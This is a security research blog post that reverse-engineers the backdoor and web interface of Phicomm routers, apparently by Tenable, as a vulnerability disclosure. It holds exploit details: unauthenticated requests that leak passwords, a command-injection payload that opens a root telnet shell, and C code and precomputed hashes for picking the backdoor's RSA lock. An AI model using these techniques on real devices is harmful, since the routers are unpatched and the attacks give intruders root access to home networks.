Normal view

There are new articles available, click to refresh the page.
Before yesterdayTenable TechBlog - Medium

A Backdoor Lockpick

Reversing Phicomm’s Backdoor Protocols

TL;DR

  1. Phicomm’s router firmware has numerous critical vulnerabilities that can be chained together by a remote, unauthenticated attacker to gain a root shell on the device.
  2. Every Phicomm router firmware since at least 2017 exposes a cryptographically locked backdoor.
  3. I’ve analysed this backdoor’s network protocol through three distinct iterations, across eleven firmware versions.
  4. And I show how the backdoor’s cryptographic lock can be “picked” to grant a root shell to an attacker.
  5. Phicomm is no more. These devices will never be patched.
  6. Not only are Phicomm devices still on the market, but their surplus is being resold by other vendors, such as Wavlink, who occasionally neglect to reflash the device and ship it with the vulnerable Phicomm firmware.

A Phicomm in Wavlink’s Clothing

In early September, 2021, a fairly ordinary and inexpensive residential router came into the Zero Day research team’s possession.

The WAVLINK AC1200, an inexpensive WiFi Router.

It was branded as a Wavlink AC1200 WiFi Router, a model that you can find on Amazon for under $30.

When I plugged in the router and attempted to navigate the browser to its administrative interface — which, according to the sticker on the bottom of the router, should have been waiting for us at 192.168.10.1 –things took an unexpected turn. The router’s DHCP server, to begin with, had assigned us an address on the 192.168.2.0/24 subnet, with 192.168.2.1 as its default gateway.

And this is what was waiting to greet me:

This doesn’t look like WAVLINK firmware…

If the Amazon reviews for the WAVLINK AC1200 are anything to go by, I wasn’t alone in this particular situation.

Quite suspicious!

With a little help from Google Translate, I set about exploring this unexpected Phicomm interface. The System Status (系统状态) page identifies the device model as K2G, hardware version A1, running firmware version 22.6.3.20.

The System Status (系统状态) page in the Phicomm firmware’s administrative web UI.

An online search for “Phicomm K2G A1” turned up a few listings for this product, which indeed bears a striking resemblance to the “WAVLINK” router we’d received from Amazon. In many cases the item was listed as “discontinued”.

This looks familiar.
A familiar looking router, with the original Phicomm branding.
Do you see the difference? (The branding is the difference.)

I take a stab at reconstructing the story of how, exactly, K2G A1 routers with Phicomm firmware made their way to the market with WAVLINK branding in the Appendix to this post, but first let’s look at a few particularly interesting vulnerabilities in this misbegotten router.

How to Get the Wifi Password

It’s never a good idea to enable remote management on a residential router, but that rarely prevents vendors from offering this feature, and there will always be users unable to resist the temptation of exposing the controls to their LAN to the Internet at large, nominally protected by a flimsy password authentication mechanism at best.

Like many other residential routers, the Phicomm K2G A1 provides this feature, and a quick perusal of Shodan shows that remote management’s been enabled on many such devices.

If the user decides to enable remote management, the UI will suggest 8181 as the default port for the administrative web interface, and 255.255.255.255 as default netmask (which will expose port 8181 to the entire WAN, which in the case of most residential networks means the Internet).

A basic Shodan search suggests that plenty of users (most of them in China) have made precisely these choices when setting up their routers.

A shodan.io search, showing some results consistent with the remote management interface on certain Phicomm routers.
A shodan.io search for “port:8181 luci”, many of whose results bear a very close resemblance to the remote-management webserver on the Phicomm K2G router.

Access to the admin panel itself requires knowledge of the password that the user chose when setting up the router. Phicomm allows the user to save several seconds and ease the burden of memory by clicking a checkbox and setting the admin password to be the same as the 2.4GHz wireless password.

The Phicomm firmware’s administrative web server exposes a number of interfaces, such as /LocalMACConfig.asp or /wirelesssetup.asp, which can be used to get and set router configuration parameters without requiring any authentication whatsoever. This is especially hazardous when remote management has been enabled, since it effectively grants administrative control of several router settings to any passer-by on the internet, and discloses some highly sensitive information.

For example, if you’re curious what devices might be connected to the router’s local area network, all you need to do is issue a request to http://10.3.3.12:8181/LocalClientList.asp?action=get (assuming 10.3.3.12 is the router’s IP address and 8181 is its remote management port):

A screenshot showing how a LAN directory can be obtained from the management webserver without authentication.
Obtaining LAN information from the Phicomm management webserver, without authentication.

Here we see the Kali and pfSense VMs I’ve connected to the Phicomm router, along with an iPad that’s spoofing its MAC address.

But suppose we’d like to connect to this LAN ourselves. If the router’s nearby, we could try to connect to one of its WiFi networks. But how do we get the password? It turns out that all you need to do is ask and the router will gladly provide it:

Screenshot showing how the WiFi passwords can be obtained without authentication.
Obtaining the WiFi passwords from the remote management service without authentication.

If the owner of that router had taken Phicomm up on its suggestion that they use the same password for both the 2.4GHz wireless network and the administrative interface, then you now have remote administrative access to the router as well.

Screenshot of the Phicomm admin panel.
Phicomm explicitly offers to set the web admin password to the 2.4GHz WiFi password.

But even if you’re not so lucky, there are a number of setting operations that the pseudo-asp endpoints enable as well.

A screenshot of the Phicomm router’s web admin UI, showing the LAN information.
The LAN information page in the administrative web UI.
A screenshot showing how to rename hosts on the target’s LAN.
You can use the unauthenticated remote management endpoint to rename hosts on the target’s LAN.
The results of this renaming attack. This is a vector for pushing potentially malicious content into the administrative web UI.

If we were feeling a little less kind, or felt that this was a network that was best avoided and decided to take matters into our own hands, we could use the same interface to ban local users from the network.

We are also able to ban users from the LAN, from the WAN, without needing any prior authentication.
What the unfortunate client sees in their browser after being banned in this way.

This type of ban only bars access to the router and the WAN, and can be easily evaded by changing the client’s MAC address.

Changing the MAC address to evade the ban.

An unbanning request for a particular MAC address can be issued by setting BlockUser parameter to 0.

[+] Requesting url http://10.3.3.12:8181//LocalMACConfig.asp?action=set&BlockUser=0&MAC=A6%3aDC%3a5C%3aF6%3a2C%3a2B&IP=unknown&DeviceRename=kali&isBind=0&ifType=0&UpMax=0&DownMax=0&_=1642459782743
{'retMACConfigresult': {'ALREADYLOGIN': 0, 'MACConfigresult': 1}}
We see that the ban depends on the MAC address of the LAN-side client. We also see that this ban can be lifted in much the same way that it was imposed, by a WAN-side machine issuing unauthenticated requests.

The library responsible for handling these .asp endpoints is the lighttpd module, mod_mobileapp.so. Of the 68 or so endpoints defined by the administrative interface, 18 can be triggered without requiring any authentication from the user. These include wirelesssetup.asp and any bearing the prefix Local:

LocalCheckClientNumber.asp
LocalCheckDetectFinish.asp
LocalCheckInetHealthStatus.asp
LocalCheckInetLinkStatus.asp
LocalCheckInetSpeedStatus.asp
LocalCheckInterfacelink.asp
LocalCheckNetworkType.asp
LocalCheckRouterPassword.asp
LocalCheckWIFI.asp
LocalCheckWanStatus.asp
LocalCheckWifiPassword.asp
LocalCheckWirelessStatus.asp
LocalClientList.asp
LocalIndex.asp
LocalMACConfig.asp
LocalNetworkSet.asp
LocalStartAutodetect.asp
wirelesssetup.asp

Escalating from an Authenticated Admin Session to a Root Shell on the Router

Suppose that you’ve managed to access the admin panel on a Phicomm K2G A1 router, thanks to the careless exposure of the admin password through the non-authenticated /wirelesssetup.asp?action=get endpoint. Obtaining a root shell on the device is now fairly straightforward, due to a command injection vulnerability in the Phicomm interface, which appears to already be fairly well-known among Phicomm router hackers. Upantool has provided a comprehensive writeup documenting this attack vector (Google translate can be helpful here, if, like me, you can’t read Chinese).

A screenshot of a post-auth command injection attack, courtesy of UpanTool.

The command injection attack is triggered by submitting the string | /usr/sbin/telnetd -l /bin/login.sh where the firmware update menu asks for a time of day at which to check for updates. The router will pass the time of day given to a shell command, which it will run with root privileges, and the pipe symbol | will instruct it to send the output of the first command to a second, which is supplied by the attacker. The injected command, /usr/sbin/telnetd -l /bin/login.sh, opens a root shell that the attacker can connect to over telnet, on port 23.

This was indeed the method I used to obtain a root shell, explore the router’s runtime environment, and download its firmware to my workstation for further analysis. (I did this the easy way, by piping each block device through gzip and over netcat to my host, and then extracting the filesystems with binwalk.)

Verification that the command injection attack documented by UpanTool works.

The first thing I wanted to do when I got there was to look at the output of netstat -tunlp to see what other services might be listening on this device.

Using netstat on the router to find which services are listening on which UDP and TCP ports.

Notice the service listening on UDP port 21210, which netstat identifies as telnetd_startup. This service provides a cryptographically locked backdoor into the router, and in the next section, we’re going to see, first, how the lock works, and second, how to pick it.

Reverse Engineering the Phicomm Backdoor

The Phicomm telnetd_startup service superficially resembles Netgear’s telnetEnable daemon, and serves a similar purpose: to allow an authorized party to activate the telnet service, which will, in turn, provide that party with a root shell on the router. What distinguishes the Phicomm backdoor is not just its elaborate challenge-and-response protocol, but that it requires that the authorized party employ a private RSA key to unlock it. This requirement, however, is not foolproof, and a critical loophole in telnetd_startup allows an attacker to “pick” the cryptographic lock without any need of the key.

Initial State

telnetd_startup begins by listening unobtrusively on UDP port 21210. Until it receives a packet containing the magic 10-byte handshake, ABCDEF1234, it will remain completely silent. Nmap will report UDP port 21210 as open|filtered, and provide no clue as to what might be listening there.

Control flow diagram of the main event loop in the telnetd_startup binary.

If the service does receive the magic handshake, it will respond with a UDP packet of its own, carrying a 16-byte buffer. An analysis of the daemon’s binary code reveals the tell-tale constants of an MD5 hash function, which would be consistent with the length of 16 bytes.

Disassembly of the block of code in telnetd_startup that initializes the hasher used to produce the product-identifying message. This hasher can be recognized as MD5 by its tell-tale constants.

void md5_init(
uint *context)
{
*context = 0;
context[2] = 0x67452301;
context[1] = 0;
context[3] = 0xefcdab89;
context[4] = 0x98badcfe;
context[5] = 0x10325476;
return;
}
Control-flow diagram of the hashing function, recognizable as MD5.
void md5_add(uint *param_1,void *param_2,uint param_3)
{
uint uVar1;
uint uVar2;
uint __n;

uVar2 = (*param_1 << 0x17) >> 0x1a;
uVar1 = param_3 * 8 + *param_1;
__n = 0x40 - uVar2;
*param_1 = uVar1;
if (uVar1 < param_3 * 8) {
param_1[1] = param_1[1] + 1;
}
param_1[1] = param_1[1] + (param_3 >> 0x1d);
if (param_3 < __n) {
__n = 0;
}
else {
memcpy((void *)((int)param_1 + uVar2 + 0x18),param_2,__n);
FUN_00402004(param_1 + 2,param_1 + 6);
while( true ) {
uVar2 = 0;
if (param_3 < __n + 0x40) break;
FUN_00402004(param_1 + 2,(int)param_2 + __n);
__n = __n + 0x40;
}
}
memcpy((void *)((int)param_1 + uVar2 + 0x18),(void *)((int)param_2 + __n),param_3 - __n);
return;
}
The block of code responsible for sending the product-identifying hash back to the client that sends the router the initiating handshake token (“ABCDEF1234”).

With a bit of help and annotation, Ghidra decompiles that code block into the following C-code:

memset(&K2_COSTDOWN__VER_3.0_at_00414ba0,0,0x80);             memcpy(&K2_COSTDOWN__VER_3.0_at_00414ba0,"K2_COSTDOWN__VER_3.0",0x14);
memset(md5,0,0x58);
md5_init(md5);
md5_add(md5,&K2_COSTDOWN__VER_3.0_at_00414ba0,0x80);
md5_digest(md5,&HASH_OF_K2_COSTDOWN_at_4149a0);
MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30 = 0;
DAT_00414b74 = 0;
DAT_00414b78 = 0;
DAT_00414b7c = 0;
memcpy(&MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30,
&HASH_OF_K2_COSTDOWN_at_4149a0,
0x10);
sendto(SKT,
&MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30,
0x10,
0,
&src_addr,
addrlen);
CHECK_STATE_004147e0 = 0;

The string that gets hashed here is "K2_COSTDOWN__VER_3.0", a product identification string, which is first copied into a zeroed-out buffer 128 bytes in length. This can easily be verified.

Verification that the product-identifying message does indeed contain an MD5 hash of a descriptive string found in the telnetd_startup binary.

After this exchange, a global variable at address 0x004147e0 is switched from its initial value of 2 to 0, and the main loop of the server enters another iteration. What we’re looking at, here, is a finite state machine, and the handshake token, "ABCDEF1234" is what sends it from the initial state into the second.

Second State

Control flow diagram of the next stage of the protocol, where the second message received from the client is “decrypted” using a hard-coded public RSA key, a random secret is generated, and then the “decrypted” message is XORed with the random secret, which is then used to generate ephemeral passwords by the set_telnet_enable_keys() function.

In the second state, shown above, in basic block graph form, and below, decompiled into C code, five important things happen after the client replies to the message containing the product-identifying hash:

S = ingest_token(payload_buffer,2);
if (S != 2) {
memset(&PAYLOAD_00414af0,0,0x80);
memcpy(&PAYLOAD_00414af0,payload_buffer,number_of_bytes_received);
S = rsa_public_decrypt_payload();
if (S != 0) break;
CHECK_STATE_004147e0 = 1;
generate_random_plaintext();
rsa_encrypt_with_public_key();
sendto(SKT,&ENCRYPTED_at_4149f0,0x80,0,&src_addr,addrlen);
xor_decrypted_payload_with_plaintext();
set_telnet_enable_keys();
goto LAB_00401e1c;
}

1. Decryption of the client’s message with a public key

The reply, which is assumed to have been encrypted with the client’s private key, is then decrypted with a public RSA key that’s been hardcoded into the binary.

It’s unclear exactly what the designers of this algorithm expect the encrypted blob to contain, and indeed there’s nothing in what follows that would really constrain its contents in any way. This step to some extent resembles the authentication request stage of the SSH public key authentication protocol. This is where the client sends the server a request containing:

  1. the username,
  2. the public key to be used, and
  3. a signature

The signature is produced by first hashing a blob of data known to both parties — the username, for example, or session ID — and then encrypting that hash with the private key that corresponds to the public key sent (2). Something similar seems to be taking place at this stage of the Phicomm backdoor protocol, except that the content of the “signature” isn’t checked in any way. There’s no username, after all, for the client to provide, and just a single valid keypair in play, which determined by the server’s own hardcoded public key. (Thanks to my colleague, Katie Sexton, for highlighting this resemblance and helping me make sense of this stage of the protocol.)

Control flow graph of the function that “decrypts” the client’s message using the hardcoded public RSA key.

Note the constant 3 passed to the OpenSSL library function, RSA_public_decrypt, which specifies that no padding is to be used. This will make our lives a significantly easier in the near future.

int rsa_public_decrypt_payload(void)
{
RSA *rsa;
BIGNUM *a;
int n;
uint digest_len;
size_t length_of_decrypted_payload;
BIGNUM *local_18 [3];
rsa = RSA_new();
local_18[0] = BN_new();
a = BN_new();
BN_set_word(a,0x10001);
BN_hex2bn(local_18, "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA70 63CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650C DB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691");
rsa->e = a;
rsa->n = local_18[0];
memset(&DECRYPTED_PAYLOAD_at_4149d0,0,0x20);
n = RSA_size(rsa);
digest_len = RSA_public_decrypt(n,
&PAYLOAD_00414af0,
&DECRYPTED_PAYLOAD_at_4149d0,
rsa,
RSA_NO_PADDING);
if (digest_len < 0x101) {
length_of_decrypted_payload = strlen(&DECRYPTED_PAYLOAD_at_4149d0);
n = -(length_of_decrypted_payload < 0x101 ^ 1);
}
else {
n = -1;
}
return n;
}

Bizarrely, telnetd_startup at no point compares the result of this “decryption” with anything. It seems to rest content so long as the decryption function doesn’t outright fail, or yield a buffer of more than 256 bytes in length – which I’m not quite sure is even possible in this context, barring an undetected bug.

The n-component of the public key is stored in the binary as a hexadecimal string, and can be easily retrieved with the strings tool. The e-component is the usual 0x10001.

$ strings -n 256 usr/bin/telnetd_startup       
E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691

An interesting question to ask, here, might be this: what’s the point of this initial exchange? An initial handshake is sent to the router, the router sends back a 16-byte message that uniquely identifies the model, and the router then expects the client to reply with a message encrypted with a particular key private key. Why the handshake ("ABCDEF1234")? Why the product-identifying hash? Why not begin the interaction with the signed or “privately encrypted” message? This protocol would make sense if the client, whoever that might be, is expected to be in possession of a database that associates each product-identifying hash it might receive with its own private RSA key. If this were to be the case, then we might be looking at a particular implementation of a general backdoor protocol.

2. A random secret is generated

A random secret consisting of exactly 31 printable ASCII characters is generated. That these characters are printable will turn out to be a helpful constraint.

Control-flow graph of the function that generates a random, 31-character secret.

3. The random secret is encrypted

The random secret is then encrypted using the hardcoded public RSA key, such that the only feasible way to decrypt it will be with the corresponding private key.

int rsa_encrypt_with_public_key(void)
{
RSA *rsa;
BIGNUM *a;
int iVar1;
BIGNUM *local_18 [3];
rsa = RSA_new();
local_18[0] = BN_new();
a = BN_new();
BN_set_word(a,0x10001);
BN_hex2bn(local_18, "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA70 63CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650C DB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691");
rsa->e = a;
rsa->n = local_18[0];
memset(&ENCRYPTED_at_4149f0,0,0x80);
iVar1 = RSA_size(rsa);
iVar1 = RSA_public_encrypt(iVar1,
&RANDOMLY_GENERATED_PLAINTEXT_at_4149b0,
&ENCRYPTED_at_4149f0,
rsa,
3);
return iVar1 >> 0x1f;
}

4. The random, plaintext secret is XORed with the client’s message

This seems like a particularly strange move to me, a needless twist of complexity that, far from improving the security of the system, will afford a means for completely undoing it. The “decrypted” message received from the client in step 1 of state 2 — “decrypted”, remember, with the public key — is bitwise-xored with the random secret.

Control-flow graph of the function that calculates the bitwise-XOR of the random secret and the result of “decrypting” the client’s second message.
void xor_decrypted_payload_with_plaintext(void)
{
byte *pbVar1;
byte *pbVar2;
int i;
byte *pbVar3;

i = 0;
do {
pbVar1 = &DECRYPTED_PAYLOAD_at_4149d0 + i;
pbVar2 = &RANDOMLY_GENERATED_PLAINTEXT_at_4149b0 + i;
pbVar3 = &XORED_MSG_00414b80 + i;
i = i + 1;
*pbVar3 = *pbVar1 ^ *pbVar2;
} while (i != 0x20);
return;
}

5. The resulting string is used to construct ephemeral passwords

Here’s where things truly break down. The string produced by XORing the random plaintext secret with the client’s “decrypted” message is concatenated with two hardcoded salts: "+PERM" and "+TEMP". The resulting concatenations are then hashed with the same MD5 algorithm used earlier to produce the product identifier. The resulting 16-byte hashes are then set as the ephemeral passwords that, if correctly guessed, will allow the client to unlock the backdoor.

int set_telnet_enable_keys(void)
{
size_t xor_str_len;
char xor_str_perm [512];
char xor_str_temp [512];
uint md5 [22];

sprintf(xor_str_perm,"%s+PERM",&XORED_MSG_00414b80);
sprintf(xor_str_temp,"%s+TEMP",&XORED_MSG_00414b80);
memset(md5,0,0x58);
md5_init(md5);
xor_str_len = strlen(xor_str_perm);
md5_add(md5,xor_str_perm,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_PERM_at_414c20);
md5_init(md5);
xor_str_len = strlen(xor_str_temp);
md5_add(md5,xor_str_temp,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_TEMP_at_0x414c30);
return 0;
}

Can you see the problem here? Think it over. We’ll come back to this in a minute.

Verifying things in the GDB

Once I had a general idea of how all the pieces fit together, I wanted to test my understanding of things by pushing a static MIPS build of gdbserver to the router, and then step through the telnetd_startup state machine with gdb-multiarch and my favourite gdb extension library, gef.

As I understood it, it seemed that telnetd_startup was expecting me, the client, to decrypt its secret message using the private RSA key that corresponds to the public key coded into the binary. Since I did not, in fact, possess that key, and since OpenSSL’s RSA implementation seemed like a tough nut to crack, I figured that I could verify my conjectures by simply cheating. I learned that if I just use the debugger to grab the random plaintext secret from the buffer at address 0x004149b0, salt it with the suffix "+TEMP", MD5-hash it, and send back the result, then I am in fact able to drive the state machine to its final destination, where system("telnetd -l /bin/login.sh") is called and the backdoor is thrown wide open. So long as I chose, for my second message, a string that I knew would be “decrypted” into a buffer of null bytes by the hardcoded public RSA key — and this is rather easy to do — I knew that that method would produce the correct ephemeral password. This gave me a pretty good indication of what we need to do in order to open the backdoor without the assistance of a debugger, and without peeking at memory that, in a realistic scenario, an attacker would have no means of seeing.

Screenshot of a debugger session (gdb-multiarch + gef), a python REPL, and a telnet session that shows how by reading the random secret directly from memory we can calculate the ephemeral password needed to initialize a telnet session. The client’s second message, in this scenario, is chosen so that the hardcoded public RSA key “decrypts” it to a buffer of null bytes.

What this proves is that all we need to do in order to open the backdoor is to either discover the private RSA key, or else guess the 31-character secret string. The odds of guessing a random string at that length are abysmal, and so, armed with the public RSA key, I focussed, at first, on rummaging around the internet for some trace of that key (in various formats) in hopes that I might find the complete key pair just lying around. A long shot, sure, but worth checking. It did not, however, pay off.

At this point I still hadn’t quite noticed the critical loophole that I mentioned earlier. It came while I was patiently sketching out the protocol diagram, shown below.

The Backdoor Protocol

Here is a complete protocol diagram of the Phicomm backdoor, as apparently intended to be used:

Picking the Backdoor’s Lock

Remember how I said, regarding step 5 of state 2, that things break down in the construction of the two ephemeral passwords? The first thing to observe here is how the XORed strings are concatenated with the two salts:

sprintf(xor_str_perm,"%s+PERM",&XORED_MSG_00414b80);
sprintf(xor_str_temp,"%s+TEMP",&XORED_MSG_00414b80);

We can expand XORED_MSG_00414b80 to make its construction a bit clearer, like so:

sprintf(xor_str_temp, 
"%s+TEMP",
xor(SECRET_PLAINTEXT,
RSA_public_decrypt(HARDCODED_PUBLIC_KEY,
ENCRYPTED_XOR_MASK)));
temp_password = MD5(xor_str_temp);

And mutatis mutandis for +PERM. Now, the format specifier %sas used by sprintf is not meant to handle just any byte arrays whatsoever. It’s meant to handle strings — null-terminated strings, to be precise. The array of bytes at &XORED_MSG_00414b80 might, in the mind of the developer, be 31 bytes long, but in the eyes of sprintf() it ends where the first null byte occurs.

If the value of the first byte of that “string” is zero (i.e, '\x00', not the ASCII numeral '0'), then %s will format it as an empty string!

If &XORED_MSG_00414b80 is treated as an empty string, then xor_str_temp and xor_str_perm are just going to be "+TEMP" and "+PERM". The random component is completely dropped! Their MD5 hashes will be entirely predictable. When that happens, this code

memset(md5,0,0x58);  
md5_init(md5);
xor_str_len = strlen(xor_str_perm);
md5_add(md5,xor_str_perm,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_PERM_at_414c20);
md5_init(md5);
xor_str_len = strlen(xor_str_temp);
md5_add(md5,xor_str_temp,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_TEMP_at_0x414c30);

will produce precisely these two hashes:

In [53]: salt = b"+TEMP" ; MD5.MD5Hash(salt + b'\x00' * (0x58 - len(salt))).digest().hex()
Out[53]: 'f73fbf2e90e43136f07279c745f2f9f2'
In [54]: salt = b"+PERM" ; MD5.MD5Hash(salt + b'\x00' * (0x58 - len(salt))).digest().hex()
Out[54]: 'c423a902bacd28bafd095350d66e7455'

What this means is that all we have to do to produce a situation where we can predict the two ephemeral passwords is to make it likely that

XORED_MSG_00414b80[0] == DECRYPTED_PAYLOAD_at_4149d0[0] ^ RANDOMLY_GENERATED_PLAINTEXT_at_4149b0[0] == '\x00'

This turns out to be easy.

In the absence of padding (i.e., when the padding variable is set to RSA_NO_PADDING (=3)),RSA_public_decrypt() will “successfully” transform the vast majority of 128-byte buffers into non-null buffers. Just to get a ballpark idea of the odds, here’s what I found when I used the hardcoded public RSA key provided to “decrypt” 1000 random buffers, in the Python REPL:

In [23]: D = [pub_decrypt(os.urandom(0x80), padding=None) for i in range(1000)]      
In [24]: len([x for x in D if x and any(x)]) / len(D)                                                                                                                                                
Out[24]: 0.903

Over 90% came back non-null. If the padding variable were set to RSA_PKCS1_PADDING, by contrast, we’d be entirely out of luck. Control of the plaintext would be virtually impossible:

In [85]: D = [pub_decrypt(os.urandom(0x80), padding="pkcs1") for x in range(1000)]
In [86]: len([x for x in D if x and any(x)]) / len(D)
Out[86]: 0.0

What this means is that so long as the server uses a padding-free cipher, we don’t actually need the private key in order to have some control over what RSA_public_decrypt() does with the message we send back to telnetd_startup at the beginning of State 2.

So, what kind of control are we after here? Simple: we want the first byte of the “decrypted” buffer to be printable. Why? Because the one thing we know about the random plaintext secret is that it’s composed of printable bytes, that is, bytes that fall somewhere between 0x21 and 0x7e, inclusive.

In [25]: len([x for x in D if (0x21 <= x[0]) and (x[0] < 0x7f)]) / len(D)                                                                                                                      
Out[25]: 0.372

So that winds up being true of about 37% of random 128-byte buffers.

Here’s a bit of C-code that will whip up some phony ciphertext, meeting these fairly broad specifications.

unsigned char *find_phony_ciphertext(RSA *rsa) {
unsigned char *phony_ciphertext;
unsigned char phony_plaintext[1024];
int plaintext_length;
memset(phony_plaintext, 0, 0x20);
phony_ciphertext = calloc(PHONY_CIPHERTEXT_LENGTH, sizeof(char));
do {
    random_buffer(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
phony_ciphertext[0] || (phony_ciphertext[0] |= 1);
    plaintext_length = decrypt_with_pubkey(rsa, 
phony_ciphertext, phony_plaintext);

if ((plaintext_length < 0x101) &&
(0x21 <= phony_plaintext[0]) &&
(phony_plaintext[0] < 0x7f)) {
printf("[!] Found stage 2 payload:\n");
hexdump(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
printf("[=] Decrypts to (%d bytes):\n", plaintext_length);
hexdump(phony_plaintext, plaintext_length);
return phony_ciphertext;
}
} while (1);
}

Once we’ve generated such a buffer, we then have a 1 in 94 (0x7f — 0x21) chance of having a message whose “decryption”, via the hardcoded RSA key, begins with the same character as the random secret plaintext. Those are astronomically better odds than trying to guess a 31-character string (94−31) or a 16-byte hash (2−128).

If we guess right, then the ephemeral password to temporarily enable telnetd will become MD5("+TEMP"), and the ephemeral password to permanently enable it will become MD5("+PERM)".

And in this fashion we can gain an unauthenticated root shell on the Phicomm router after somewhere in the ballpark of one hundred guesses.

Protocol Diagram Showing How the Backdoor Lock can be Picked

Proof of concept

To bring these findings together, I wrote a small proof-of-concept program in C that will reliably pick the lock on the Phicomm router’s backdoor and grant the user a root shell over telnet. You can see it in action below.

A screencast showing our exploit in action, successfully picking the lock on the Phicomm K2G router’s backdoor.

Picking the Lock on the K3C’s Backdoor

An advertisement for the Phicomm K3C, which sports an essentially identical backdoor.

I was curious whether Phicomm’s flagship router, the K3C, might implement the same backdoor protocol, and, if so, whether it might be vulnerable to an identical attack. These devices are still available through Phicomm’s Amazon storefront, for less than $30. So I put in an order for the device, and while I waited, set about scouring a few Chinese forums for surviving copies of the K3C’s firmware image. I was in luck! I was able to obtain firmware images for the K3C, in each of the following versions:

  • 32.1.15.93
  • 32.1.22.113
  • 32.1.26.175
  • 32.1.45.267
  • 32.1.46.268
$ find . -path "*usr/bin/telnetd_startup" -exec bash -c 'echo -e "$(grep -o "fw_ver .*" $(dirname {})/../../etc/config/system)\n\tMD5 HASH OF BINARY: $(md5sum {})\n\tPRODUCT IDENTIFIER: $(strings {} | grep VER)\n\tPUBLIC RSA KEY(S): $(strings -n 256 {})\n"' {} \;
fw_ver '32.1.15.93'
MD5 HASH OF BINARY: f53a60b140009d91b51e4f24e483e893 ./_K3C_V32.1.15.93.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
9FC8FFBF53AECF8461DEFB98D81486A5D2DEE341F377BA16FB1218FBAE23BB1F3766732F8D382E15543FC2980208D968E7AE1AC4B48F53719F6D9964E583A0B791150B9C0C354143AE285567D8C042240CA8D7A6446E49CCAF575ACC63C55BAC8CF5B6A77DEE0580E50C2BFEB62C06ACA49E0FD0831D1BB0CB72BC9B565313C9
fw_ver '32.1.22.113'
MD5 HASH OF BINARY: d23c3c27268e2d16c721f792f8226b1d ./_K3C_V32.1.22.113.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
fw_ver '32.1.26.175'
MD5 HASH OF BINARY: d23c3c27268e2d16c721f792f8226b1d ./_K3C_V32.1.26.175.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
fw_ver '32.1.45.267'
MD5 HASH OF BINARY: 283b65244c4eafe8252cb3b43780a847 ./_SW_K3C_703004761_V32.1.45.267.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER: K3C_INTELALL_VER_3.0
PUBLIC RSA KEY(S): E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C8349B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B6AE92815388B3E03
fw_ver '32.1.46.268'
MD5 HASH OF BINARY: 283b65244c4eafe8252cb3b43780a847 ./_K3C_V32.1.46.268.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER: K3C_INTELALL_VER_3.0
PUBLIC RSA KEY(S): E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C8349B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B6AE92815388B3E03

The older versions appeared to work differently, and in one of the writeups I dug up on Baidu, I found instructions for using a tool that sounded, at first, very much like mine in order to gain a root shell over telnet, so as to upgrade the firmware to the most recent version — something no longer facilitated by the official Phicomm firmware repository, which shut its doors when the company collapsed at the beginning of 2019.

